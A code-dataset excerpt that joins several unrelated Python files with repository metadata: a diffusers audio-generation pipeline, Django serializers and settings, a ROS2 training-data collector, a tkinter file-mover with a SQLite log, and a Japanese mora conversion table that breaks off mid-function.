[`IPNDMScheduler`].
"""
def __init__(self, unet, scheduler):
super().__init__()
self.register_modules(unet=unet, scheduler=scheduler)
@torch.no_grad()
def __call__(
self,
batch_size: int = 1,
num_inference_steps: int = 100,
generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,
audio_length_in_s: Optional[float] = None,
return_dict: bool = True,
) -> Union[AudioPipelineOutput, Tuple]:
r"""
The call function to the pipeline for generation.
Args:
batch_size (`int`, *optional*, defaults to 1):
The number of audio samples to generate.
num_inference_steps (`int`, *optional*, defaults to 50):
The number of denoising steps. More denoising steps usually lead to a higher-quality audio sample at
the expense of slower inference.
generator (`torch.Generator`, *optional*):
A [`torch.Generator`](https://pytorch.org/docs/stable/generated/torch.Generator.html) to make
generation deterministic.
audio_length_in_s (`float`, *optional*, defaults to `self.unet.config.sample_size/self.unet.config.sample_rate`):
The length of the generated audio sample in seconds.
return_dict (`bool`, *optional*, defaults to `True`):
Whether or not to return a [`~pipelines.AudioPipelineOutput`] instead of a plain tuple.
Example:
```py
from diffusers import DiffusionPipeline
from scipy.io.wavfile import write
model_id = "harmonai/maestro-150k"
pipe = DiffusionPipeline.from_pretrained(model_id)
pipe = pipe.to("cuda")
audios = pipe(audio_length_in_s=4.0).audios
# To save locally
for i, audio in enumerate(audios):
write(f"maestro_test_{i}.wav", pipe.unet.sample_rate, audio.transpose())
        # To display in Google Colab
import IPython.display as ipd
for audio in audios:
display(ipd.Audio(audio, rate=pipe.unet.sample_rate))
```
Returns:
[`~pipelines.AudioPipelineOutput`] or `tuple`:
If `return_dict` is `True`, [`~pipelines.AudioPipelineOutput`] is returned, otherwise a `tuple` is
returned where the first element is a list with the generated audio.
"""
if audio_length_in_s is None:
audio_length_in_s = self.unet.config.sample_size / self.unet.config.sample_rate
sample_size = audio_length_in_s * self.unet.config.sample_rate
down_scale_factor = 2 ** len(self.unet.up_blocks)
if sample_size < 3 * down_scale_factor:
raise ValueError(
f"{audio_length_in_s} is too small. Make sure it's bigger or equal to"
f" {3 * down_scale_factor / self.unet.config.sample_rate}."
)
original_sample_size = int(sample_size)
if sample_size % down_scale_factor != 0:
sample_size = (
(audio_length_in_s * self.unet.config.sample_rate) // down_scale_factor + 1
) * down_scale_factor
logger.info(
f"{audio_length_in_s} is increased to {sample_size / self.unet.config.sample_rate} so that it can be handled"
f" by the model. It will be cut to {original_sample_size / self.unet.config.sample_rate} after the denoising"
" process."
)
sample_size = int(sample_size)
dtype = next(self.unet.parameters()).dtype
shape = (batch_size, self.unet.config.in_channels, sample_size)
if isinstance(generator, list) and len(generator) != batch_size:
raise ValueError(
f"You have passed a list of generators of length {len(generator)}, but requested an effective batch"
f" size of {batch_size}. Make sure the batch size matches the length of the generators."
)
audio = randn_tensor(shape, generator=generator, device=self._execution_device, dtype=dtype)
# set step values
self.scheduler.set_timesteps(num_inference_steps, device=audio.device)
self.scheduler.timesteps = self.scheduler.timesteps.to(dtype)
for t in self.progress_bar(self.scheduler.timesteps):
# 1. predict noise model_output
model_output = self.unet(audio, t).sample
# 2. compute previous audio sample: x_t -> t_t-1
audio = self.scheduler.step(model_output, t, audio).prev_sample
audio = audio.clamp(-1, 1).float().cpu().numpy()
audio = audio[:, :, :original_sample_size]
if not return_dict:
return (audio,)
return AudioPipelineOutput(audios=audio)
| [
"[email protected]"
] | |
d6e06778da1716fbaaf68b4e91319ac1c219ef43 | daaf133cc4146ecd3b0df5ceafea84daa6bac2ce | /project/notes/serializers.py | 085cf9d4da8d8d79ed810d541f550edae69f4dcb | [] | no_license | core-api/heroku-app | 8c29452c609e4ff2344542e1e952a343f29953f6 | 7f03a36dc34baddcdf4cda8534ab800a98e079c9 | refs/heads/master | 2023-07-20T05:34:25.707890 | 2016-01-20T12:32:12 | 2016-01-20T12:32:12 | 32,865,301 | 1 | 0 | null | 2016-01-20T12:23:01 | 2015-03-25T13:11:06 | Python | UTF-8 | Python | false | false | 326 | py | from rest_framework import serializers
class AddNoteSerializer(serializers.Serializer):
description = serializers.CharField(max_length=100)
class EditNoteSerializer(serializers.Serializer):
description = serializers.CharField(max_length=100, required=False)
complete = serializers.BooleanField(required=False)
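# A minimal usage sketch (assumption: it runs inside a configured Django project,
# e.g. from `manage.py shell`); it shows how AddNoteSerializer validates input.
def example_validate_note(description='Buy milk'):
    # Wrap the raw input in the serializer and let it enforce the field rules above.
    serializer = AddNoteSerializer(data={'description': description})
    serializer.is_valid(raise_exception=True)
    return serializer.validated_data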
| [
"[email protected]"
] | |
86068bfd992218949b5ac84033b0fc92b8e8480d | c6f1420a16f4b9bcebbc8c4a2f47a57908544386 | /scripts/collect_training_data.py | d33a4e0e1721ff93abc94dc70305df928d5af0ca | [] | no_license | AndreasZachariae/petra_patient_monitoring | 0324b1cc56dace0a31cf210a11aee5961e9ad21d | 6b099eb4a68506767f97577565e3580689ef2dda | refs/heads/master | 2023-02-10T23:31:46.794627 | 2021-01-11T17:26:13 | 2021-01-11T17:26:13 | 323,618,194 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,406 | py | #!/usr/bin/env python3
import sys
import numpy as np
import pandas as pd
import rclpy
from rclpy.node import Node
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import cv2
from petra_interfaces.msg import PatientFeatures
############################################# Constants #################################################################
image_topic = 'image'
#data_path = "~/petra_ws/src/petra_patient_monitoring/data/features.csv"
data_path = "data/features.csv"
#image_path = '//home//andreas//petra_ws//src//petra_patient_monitoring//data//images'
image_path = '//data//images'
header = ["Image", "Video", "Frame", "Class", "Presence", "TorsoBoundingBoxRatio", "HeadGroundDistance", "BufferedHeadGroundDistance",
"HeadVelocity", "BufferedHeadVelocity", "TorsoHeight", "BufferedTorsoHeight", "Centroid", "BufferedCentroid"]
video_id = 11
#########################################################################################################################
bridge = CvBridge()
df = pd.read_csv(data_path)
data = []
for row in range(len(df)):
row_data = []
for col in range(1, len(header)+1):
row_data.append(df.iloc[row, col])
data.append(row_data)
class CollectTrainingData(Node):
def __init__(self):
super().__init__('CollectTrainingData')
self.patient_features_subscriber = self.create_subscription(PatientFeatures, 'PatientFeatures', self.patient_features_callback, 50)
self.image_subscriber = self.create_subscription(Image, image_topic, self.image_callback, 50)
self.frame_id = 0
def patient_features_callback(self, msg):
entry = []
time = (msg.image_header.stamp.sec * 1000000000) + msg.image_header.stamp.nanosec
entry.append(time) # Image
entry.append(video_id) # Video
self.frame_id += 1
entry.append(self.frame_id) # Frame
entry.append(0) # Class
entry.append(msg.presence)
entry.append(msg.torso_bounding_box_ratio)
entry.append(msg.head_ground_distance)
entry.append(msg.buffered_head_ground_distance)
entry.append(msg.head_y_velocity)
entry.append(msg.buffered_head_y_velocity)
entry.append(msg.torso_height)
entry.append(msg.buffered_torso_height)
entry.append(msg.centroid)
entry.append(msg.buffered_centroid)
data.append(entry)
# self.get_logger().info("Added new data entry")
def image_callback(self, msg):
try:
cv2_img = bridge.imgmsg_to_cv2(msg, "bgr8")
except CvBridgeError as e:
print(e)
else:
time = (msg.header.stamp.sec * 1000000000) + msg.header.stamp.nanosec
path = image_path + '//video' + str(video_id) + '//Image' + str(time) + '.jpeg'
cv2.imwrite(path, cv2_img)
print("image saved to " + path)
def save_data():
df_new = pd.DataFrame(data, columns=header)
df_new.to_csv(data_path)
def main(args=None):
rclpy.init(args=args)
node = CollectTrainingData()
try:
rclpy.spin(node)
except KeyboardInterrupt:
save_data()
print('node stopped cleanly')
except BaseException:
print('exception in node:', file=sys.stderr)
raise
finally:
node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
67909727dea76eb4f1eeb39edfacc633490c1ac9 | 601971884962c3208f7a2feabc8d48e0635a0120 | /Web/Plant_project/Plant/settings.py | 4ce164002b26360c2286e05cba699178ac823338 | [] | no_license | graceFor/Hanium_Project | 91d94b9c9eeffb15b68f53a1b031fbe26e89057a | 13c40fcc8b84ff4d39a2deecd4b2fe9eb1b7e08a | refs/heads/master | 2022-11-30T06:10:28.762145 | 2020-08-12T08:15:31 | 2020-08-12T08:15:31 | 278,850,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,279 | py | """
Django settings for Plant project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'i2=6d6)qak%(^*21z0ohsq*brj00i1mncb!v+=l#u)93qlol*('
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'plantapp.apps.PlantappConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Plant.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates'), ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Plant.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'plantapp', 'static')
]
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"[email protected]"
] | |
9dfec48e40772393fd8d7d112751345456b6b289 | 28cbd8542834e5d9dd04b36a3dd11cd8d0df0ea9 | /UIForFileMovementFunc.py | 3eedf83a58de740668e157b5e6ff3c9639a497d8 | [] | no_license | reismahnic/Python-Program-For-Moving-Files-With-UI-And-Last-Run-Display | 43becc58d8fc79cfbed76f7a17586756b11a3dff | a2b48cf0eaab1213d66b094cbf48225bb6b4b4ab | refs/heads/master | 2020-07-12T06:59:07.945791 | 2017-06-14T22:23:06 | 2017-06-14T22:23:06 | 94,277,568 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,660 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Python Ver: 3.6.1
#
# Author: Reis Mahnic
#
# Purpose: Moves recently edited files from one folder to another. Also displays last moved date and time.
#
#
# Tested OS: This code was written and tested to work with Windows 10.
import os
from tkinter import *
import tkinter as tk
from tkinter import messagebox
import sqlite3
import shutil
import datetime as dt
from tkinter.filedialog import askdirectory
from tkinter import filedialog
import datetime
from datetime import datetime, timedelta
# Be sure to import our other modules
# so we can have access to them
import UIForFileMovement
#create database
def create_db(self):
conn = sqlite3.connect('db_transferLog.db')
displayLast(self)
cur = conn.cursor()
cur.execute("CREATE TABLE if not exists tbl_transferLog(ID INTEGER PRIMARY KEY AUTOINCREMENT,col_logTime TEXT);")
conn.commit()
conn.close()
count_records()
first_run(self)
def first_run(self):
conn = sqlite3.connect('db_transferLog.db')
cur = conn.cursor()
    count = count_records()  # count_records opens its own connection and returns an int
if count < 1:
cur.execute("""INSERT INTO tbl_transferLog (col_logTime) VALUES (?)""", ('08/06/17 19-09',))
conn.commit()
conn.close()
def count_records():
conn = sqlite3.connect('db_transferLog.db')
cur = conn.cursor()
count = ""
count = cur.execute("""SELECT COUNT(*) FROM tbl_transferLog""").fetchone()
    if count is None:
        conn.close()
        return 0
    conn.close()
    return count[0]
# catch if the user's clicks on the windows upper-right 'X' to ensure they want to close
def ask_quit(self):
if messagebox.askokcancel("Exit program", "Okay to exit application?"):
# This closes app
self.master.destroy()
os._exit(0)
def selectSourceDirectory(self):
source = filedialog.askdirectory()
self.sourceReturn.set(source)
def selectDestinationDirectory(self):
destination = filedialog.askdirectory()
self.destinationReturn.set(destination)
def setFileSource(self):
#List the source folder and destination folder
source = self.sourceReturn.get()
destination = self.destinationReturn.get()
print(source)
print(destination)
#Define the current time and the time period we want to look back at
now = dt.datetime.now()
before = now - dt.timedelta(hours=24)
#Print the list of file names
files = os.listdir(source)
addToList(self)
displayLast(self)
for root,dirs,files in os.walk(source):
for file_name in files:
path = os.path.join(root,file_name)
st = os.stat(path)
mod_time = dt.datetime.fromtimestamp(st.st_mtime)
if mod_time > before:
#Move all files in Folder A to Folder B
shutil.move(os.path.join(root, file_name), destination)
def addToList(self):
conn = sqlite3.connect('db_transferLog.db')
cur = conn.cursor()
var_logTime = dt.datetime.now()
cur.execute("""INSERT INTO tbl_transferLog (col_logTime) VALUES (?)""", (str((var_logTime)),))
conn.commit()
print(var_logTime)
def displayLast(self):
conn = sqlite3.connect('db_transferLog.db')
cur = conn.cursor()
try:
cur.execute("""SELECT col_logTime FROM tbl_transferLog WHERE ID = (SELECT MAX(ID) FROM tbl_transferLog);""")
varLastTime = cur.fetchall()
for data in varLastTime:
self.lbl_lastUse.config(text = 'Last Run: ' + (str(varLastTime[0])))
print(str(varLastTime))
except:
self.lbl_lastUse.config(text = 'The database is empty.')
| [
"[email protected]"
] | |
d63c6983f2dcdf576ef3ebfafdf14196ef632044 | c64269774427d81b474b923839c0ed24a8ac38f1 | /zoomident.py | d46f2d4485be6163432d1a911b8fb0b80d66ca34 | [
"LicenseRef-scancode-public-domain"
] | permissive | euske/python3-toys | ba6be94c61e75473426909d0a23d65b9eb54bf2a | 9945f22167e580f6e3ba1dc4a1513d25f2e6bafa | refs/heads/master | 2023-04-01T04:55:20.477855 | 2023-03-27T02:54:28 | 2023-03-27T02:54:28 | 45,541,191 | 8 | 7 | null | null | null | null | UTF-8 | Python | false | false | 20,046 | py | #!/usr/bin/env python
##
## Usage:
## $ ./zoomident.py -i meibo.csv -i extra.txt -p10:10 report.csv
##
## report.csv:
## 祐介 新山,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## 新山 (祐),,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## 99B99999 新山祐介,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## シンヤマユウスケ,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## Yusuke Shinyama,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
##
## meibo.csv:
## CS2,Dept,99B99999,新山 祐介,シンヤマ ユウスケ,,,2001/1/1,,,[email protected]
##
## extra.txt:
## 99B99999 新山 祐介 しんやま
##
import sys
import csv
from datetime import datetime, time
## Mora
##
class Mora:
def __init__(self, mid, zenk, hank, zenh, *rules):
self.mid = mid
self.zenk = zenk
self.hank = hank
self.zenh = zenh
self.roff = []
self.reng = []
for rule in rules:
if rule.startswith('!'):
self.roff.append(rule[1:])
elif rule.startswith('+'):
self.reng.append(rule[1:])
else:
self.roff.append(rule)
self.reng.append(rule)
#assert self.roff, rules
#assert self.reng, rules
return
def __repr__(self):
return '<%s>' % self.mid
def __str__(self):
return self.zenk
## Mora Table
##
class MoraTable:
@classmethod
def get(klass, k):
return klass.KEY2MORA.get(k, k)
MORA_NN = Mora(
'.n', 'ン', '\uff9d', 'ん', "n'", '+n',
'n:k', 'n:s', 'n:t', 'n:c', 'n:h', 'n:m', 'n:r', 'n:w',
'n:g', 'n:z', 'n:d', 'n:j', 'n:b', 'n:f', 'n:p', 'm:p',
'n:q', 'n:v', 'n:x', 'n:l')
ALL = (
# (symbol, zenkaku_kana, hankaku_kana, zenkaku_hira, output, input)
MORA_NN,
Mora('.a', 'ア', '\uff71', 'あ', 'a'),
Mora('.i', 'イ', '\uff72', 'い', 'i', '+y'),
Mora('.u', 'ウ', '\uff73', 'う', 'u', 'wu', '+w'),
Mora('.e', 'エ', '\uff74', 'え', 'e'),
Mora('.o', 'オ', '\uff75', 'お', 'o'),
Mora('ka', 'カ', '\uff76', 'か', 'ka', '+ca'),
Mora('ki', 'キ', '\uff77', 'き', 'ki', '+ky'),
Mora('ku', 'ク', '\uff78', 'く', 'ku', '+k', '+c', '+q'),
Mora('ke', 'ケ', '\uff79', 'け', 'ke'),
Mora('ko', 'コ', '\uff7a', 'こ', 'ko'),
Mora('sa', 'サ', '\uff7b', 'さ', 'sa'),
Mora('si', 'シ', '\uff7c', 'し', '!si', 'shi', '+si', '+sy'),
Mora('su', 'ス', '\uff7d', 'す', 'su', '+s'),
Mora('se', 'セ', '\uff7e', 'せ', 'se'),
Mora('so', 'ソ', '\uff7f', 'そ', 'so'),
Mora('ta', 'タ', '\uff80', 'た', 'ta'),
Mora('ti', 'チ', '\uff81', 'ち', '!ti', 'chi', 'ci', '+ch'),
Mora('tu', 'ツ', '\uff82', 'つ', '!tu', 'tsu'),
Mora('te', 'テ', '\uff83', 'て', 'te'),
Mora('to', 'ト', '\uff84', 'と', 'to', '+t'),
Mora('na', 'ナ', '\uff85', 'な', 'na'),
Mora('ni', 'ニ', '\uff86', 'に', 'ni', '+ny'),
Mora('nu', 'ヌ', '\uff87', 'ぬ', 'nu'),
Mora('ne', 'ネ', '\uff88', 'ね', 'ne'),
Mora('no', 'ノ', '\uff89', 'の', 'no'),
Mora('ha', 'ハ', '\uff8a', 'は', 'ha'),
Mora('hi', 'ヒ', '\uff8b', 'ひ', 'hi', '+hy'),
Mora('hu', 'フ', '\uff8c', 'ふ', '!hu', 'fu', '+hu', '+f'),
Mora('he', 'ヘ', '\uff8d', 'へ', 'he'),
Mora('ho', 'ホ', '\uff8e', 'ほ', 'ho'),
Mora('ma', 'マ', '\uff8f', 'ま', 'ma'),
Mora('mi', 'ミ', '\uff90', 'み', 'mi', '+my'),
Mora('mu', 'ム', '\uff91', 'む', 'mu', '+m'),
Mora('me', 'メ', '\uff92', 'め', 'me'),
Mora('mo', 'モ', '\uff93', 'も', 'mo'),
Mora('ya', 'ヤ', '\uff94', 'や', 'ya'),
Mora('yu', 'ユ', '\uff95', 'ゆ', 'yu'),
Mora('ye', 'イェ', '\uff72\uff6a', 'いぇ', 'ye'),
Mora('yo', 'ヨ', '\uff96', 'よ', 'yo'),
Mora('ra', 'ラ', '\uff97', 'ら', 'ra', '+la'),
Mora('ri', 'リ', '\uff98', 'り', 'ri', '+li', '+ry', '+ly'),
Mora('ru', 'ル', '\uff99', 'る', 'ru', '+lu', '+r', '+l'),
Mora('re', 'レ', '\uff9a', 'れ', 're', '+le'),
Mora('ro', 'ロ', '\uff9b', 'ろ', 'ro', '+lo'),
Mora('wa', 'ワ', '\uff9c', 'わ', 'wa'),
Mora('wi', 'ウィ', '\uff73\uff68', 'うぃ', 'whi', '+wi', '+wy', '+why'),
Mora('we', 'ウェ', '\uff73\uff6a', 'うぇ', 'whe', '+we'),
Mora('wo', 'ウォ', '\uff73\uff6b', 'うぉ', 'who'),
Mora('Wi', 'ヰ', None, 'ゐ', '!wi'),
Mora('We', 'ヱ', None, 'ゑ', '!we'),
Mora('Wo', 'ヲ', '\uff66', 'を', 'wo'),
# Special moras: They don't have actual pronunciation,
# but we keep them for IMEs.
Mora('xW', 'ァ', '\uff67', 'ぁ', '!xa', '!la'),
Mora('xI', 'ィ', '\uff68', 'ぃ', '!xi', '!li'),
Mora('xV', 'ゥ', '\uff69', 'ぅ', '!xu', '!lu'),
Mora('xE', 'ェ', '\uff6a', 'ぇ', '!xe', '!le'),
Mora('xR', 'ォ', '\uff6b', 'ぉ', '!xo', '!lo'),
Mora('xA', 'ャ', '\uff6c', 'ゃ', '!xya', '!lya'),
Mora('xU', 'ュ', '\uff6d', 'ゅ', '!xyu', '!lyu'),
Mora('xO', 'ョ', '\uff6e', 'ょ', '!xyo', '!lyo'),
# chouon
Mora('x-', 'ー', '\uff70', 'ー', '!x-', '+h'),
# choked sound (Sokuon)
Mora('.t', 'ッ', '\uff6f', 'っ', '!xtu', '!ltu',
'k:k', 's:s', 't:t', 'h:h', 'f:f', 'm:m', 'r:r',
'g:g', 'z:z', 'j:j', 'd:d', 'b:b', 'v:v', 'b:c', 't:c'),
# voiced (Dakuon)
Mora('ga', 'ガ', '\uff76\uff9e', 'が', 'ga'),
Mora('gi', 'ギ', '\uff77\uff9e', 'ぎ', 'gi', '+gy'),
Mora('gu', 'グ', '\uff78\uff9e', 'ぐ', 'gu', '+g'),
Mora('ge', 'ゲ', '\uff79\uff9e', 'げ', 'ge'),
Mora('go', 'ゴ', '\uff7a\uff9e', 'ご', 'go'),
Mora('za', 'ザ', '\uff7b\uff9e', 'ざ', 'za'),
Mora('zi', 'ジ', '\uff7c\uff9e', 'じ', '!zi', 'ji', '+zi'),
Mora('zu', 'ズ', '\uff7d\uff9e', 'ず', 'zu', '+z'),
Mora('ze', 'ゼ', '\uff7e\uff9e', 'ぜ', 'ze'),
Mora('zo', 'ゾ', '\uff7f\uff9e', 'ぞ', 'zo'),
Mora('da', 'ダ', '\uff80\uff9e', 'だ', 'da'),
Mora('di', 'ヂ', '\uff81\uff9e', 'ぢ', '!di', 'dzi'),
Mora('du', 'ヅ', '\uff82\uff9e', 'づ', '!du', 'dzu'),
Mora('de', 'デ', '\uff83\uff9e', 'で', 'de'),
Mora('do', 'ド', '\uff84\uff9e', 'ど', 'do', '+d'),
Mora('ba', 'バ', '\uff8a\uff9e', 'ば', 'ba'),
Mora('bi', 'ビ', '\uff8b\uff9e', 'び', 'bi', '+by'),
Mora('bu', 'ブ', '\uff8c\uff9e', 'ぶ', 'bu', '+b'),
Mora('be', 'ベ', '\uff8d\uff9e', 'べ', 'be'),
Mora('bo', 'ボ', '\uff8e\uff9e', 'ぼ', 'bo'),
# p- sound (Handakuon)
Mora('pa', 'パ', '\uff8a\uff9f', 'ぱ', 'pa'),
Mora('pi', 'ピ', '\uff8b\uff9f', 'ぴ', 'pi', '+py'),
Mora('pu', 'プ', '\uff8c\uff9f', 'ぷ', 'pu', '+p'),
Mora('pe', 'ペ', '\uff8d\uff9f', 'ぺ', 'pe'),
Mora('po', 'ポ', '\uff8e\uff9f', 'ぽ', 'po'),
# double consonants (Youon)
Mora('KA', 'キャ', '\uff77\uff6c', 'きゃ', 'kya'),
Mora('KU', 'キュ', '\uff77\uff6d', 'きゅ', 'kyu', '+cu'),
Mora('KE', 'キェ', '\uff77\uff6a', 'きぇ', 'kye'),
Mora('KO', 'キョ', '\uff77\uff6e', 'きょ', 'kyo'),
Mora('kA', 'クァ', '\uff78\uff67', 'くぁ', 'qa'),
Mora('kI', 'クィ', '\uff78\uff68', 'くぃ', 'qi'),
Mora('kE', 'クェ', '\uff78\uff6a', 'くぇ', 'qe'),
Mora('kO', 'クォ', '\uff78\uff6b', 'くぉ', 'qo'),
Mora('SA', 'シャ', '\uff7c\uff6c', 'しゃ', '!sya', 'sha', '+sya'),
Mora('SU', 'シュ', '\uff7c\uff6d', 'しゅ', '!syu', 'shu', '+syu', '+sh'),
Mora('SE', 'シェ', '\uff7c\uff6a', 'しぇ', '!sye', 'she', '+sye'),
Mora('SO', 'ショ', '\uff7c\uff6e', 'しょ', '!syo', 'sho', '+syo'),
Mora('CA', 'チャ', '\uff81\uff6c', 'ちゃ', '!tya', '!cya', 'cha'),
Mora('CU', 'チュ', '\uff81\uff6d', 'ちゅ', '!tyu', '!cyu', 'chu'),
Mora('CE', 'チェ', '\uff81\uff6a', 'ちぇ', '!tye', '!cye', 'che'),
Mora('CO', 'チョ', '\uff81\uff6e', 'ちょ', '!tyo', '!cyo', 'cho'),
Mora('TI', 'ティ', '\uff83\uff68', 'てぃ', '!tyi', '+ti'),
Mora('TU', 'テュ', '\uff83\uff6d', 'てゅ', '!thu', '+tu'),
Mora('TO', 'トゥ', '\uff84\uff69', 'とぅ', '!tho', '+two'),
Mora('NA', 'ニャ', '\uff86\uff6c', 'にゃ', 'nya'),
Mora('NU', 'ニュ', '\uff86\uff6d', 'にゅ', 'nyu'),
Mora('NI', 'ニェ', '\uff86\uff6a', 'にぇ', 'nye'),
Mora('NO', 'ニョ', '\uff86\uff6e', 'にょ', 'nyo'),
Mora('HA', 'ヒャ', '\uff8b\uff6c', 'ひゃ', 'hya'),
Mora('HU', 'ヒュ', '\uff8b\uff6d', 'ひゅ', 'hyu'),
Mora('HE', 'ヒェ', '\uff8b\uff6a', 'ひぇ', 'hye'),
Mora('HO', 'ヒョ', '\uff8b\uff6e', 'ひょ', 'hyo'),
Mora('FA', 'ファ', '\uff8c\uff67', 'ふぁ', 'fa'),
Mora('FI', 'フィ', '\uff8c\uff68', 'ふぃ', 'fi', '+fy'),
Mora('FE', 'フェ', '\uff8c\uff6a', 'ふぇ', 'fe'),
Mora('FO', 'フォ', '\uff8c\uff6b', 'ふぉ', 'fo'),
Mora('FU', 'フュ', '\uff8c\uff6d', 'ふゅ', 'fyu'),
Mora('Fo', 'フョ', '\uff8c\uff6e', 'ふょ', 'fyo'),
Mora('MA', 'ミャ', '\uff90\uff6c', 'みゃ', 'mya'),
Mora('MU', 'ミュ', '\uff90\uff6d', 'みゅ', 'myu'),
Mora('ME', 'ミェ', '\uff90\uff6a', 'みぇ', 'mye'),
Mora('MO', 'ミョ', '\uff90\uff6e', 'みょ', 'myo'),
Mora('RA', 'リャ', '\uff98\uff6c', 'りゃ', 'rya', '+lya'),
Mora('RU', 'リュ', '\uff98\uff6d', 'りゅ', 'ryu', '+lyu'),
Mora('RE', 'リェ', '\uff98\uff6a', 'りぇ', 'rye', '+lye'),
Mora('RO', 'リョ', '\uff98\uff6e', 'りょ', 'ryo', '+lyo'),
# double consonants + voiced
Mora('GA', 'ギャ', '\uff77\uff9e\uff6c', 'ぎゃ', 'gya'),
Mora('GU', 'ギュ', '\uff77\uff9e\uff6d', 'ぎゅ', 'gyu'),
Mora('GE', 'ギェ', '\uff77\uff9e\uff6a', 'ぎぇ', 'gye'),
Mora('GO', 'ギョ', '\uff77\uff9e\uff6e', 'ぎょ', 'gyo'),
Mora('Ja', 'ジャ', '\uff7c\uff9e\uff6c', 'じゃ', 'ja', 'zya'),
Mora('Ju', 'ジュ', '\uff7c\uff9e\uff6d', 'じゅ', 'ju', 'zyu'),
Mora('Je', 'ジェ', '\uff7c\uff9e\uff6a', 'じぇ', 'je', 'zye'),
Mora('Jo', 'ジョ', '\uff7c\uff9e\uff6e', 'じょ', 'jo', 'zyo'),
Mora('JA', 'ヂャ', '\uff81\uff9e\uff6c', 'ぢゃ', 'zha'),
Mora('JU', 'ヂュ', '\uff81\uff9e\uff6d', 'ぢゅ', 'zhu'),
Mora('JE', 'ヂェ', '\uff81\uff9e\uff6a', 'ぢぇ', 'zhe'),
Mora('JO', 'ヂョ', '\uff81\uff9e\uff6e', 'ぢょ', 'zho'),
Mora('dI', 'ディ', '\uff83\uff9e\uff68', 'でぃ', '+di', 'dyi'),
Mora('dU', 'デュ', '\uff83\uff9e\uff6d', 'でゅ', '+du', 'dyu', 'dhu'),
Mora('dO', 'ドゥ', '\uff84\uff9e\uff69', 'どぅ', 'dho'),
Mora('BA', 'ビャ', '\uff8b\uff9e\uff6c', 'びゃ', 'bya'),
Mora('BU', 'ビュ', '\uff8b\uff9e\uff6d', 'びゅ', 'byu'),
Mora('BE', 'ビェ', '\uff8b\uff9e\uff6a', 'びぇ', 'bye'),
Mora('BO', 'ビョ', '\uff8b\uff9e\uff6e', 'びょ', 'byo'),
Mora('va', 'ヴァ', '\uff73\uff9e\uff67', 'う゛ぁ', 'va'),
Mora('vi', 'ヴィ', '\uff73\uff9e\uff68', 'う゛ぃ', 'vi', '+vy'),
Mora('vu', 'ヴ', '\uff73\uff9e', 'う゛', 'vu', '+v'),
Mora('ve', 'ヴェ', '\uff73\uff9e\uff6a', 'う゛ぇ', 've'),
Mora('vo', 'ヴォ', '\uff73\uff9e\uff6b', 'う゛ぉ', 'vo'),
# double consonants + p-sound
Mora('PA', 'ピャ', '\uff8b\uff9f\uff6c', 'ぴゃ', 'pya'),
Mora('PU', 'ピュ', '\uff8b\uff9f\uff6d', 'ぴゅ', 'pyu'),
Mora('PE', 'ピェ', '\uff8b\uff9f\uff6a', 'ぴぇ', 'pye'),
Mora('PO', 'ピョ', '\uff8b\uff9f\uff6e', 'ぴょ', 'pyo'),
)
KEY2MORA = { m.mid:m for m in ALL }
## Mora Parser
##
class MoraParser:
def __init__(self):
self._tree = {}
for m in MoraTable.ALL:
for k in (m.zenk, m.hank, m.zenh):
if k is None: continue
self.add(k, m, allowConflict=True)
return
def add(self, s, m, allowConflict=False):
#print('add:', s, m)
t0 = self._tree
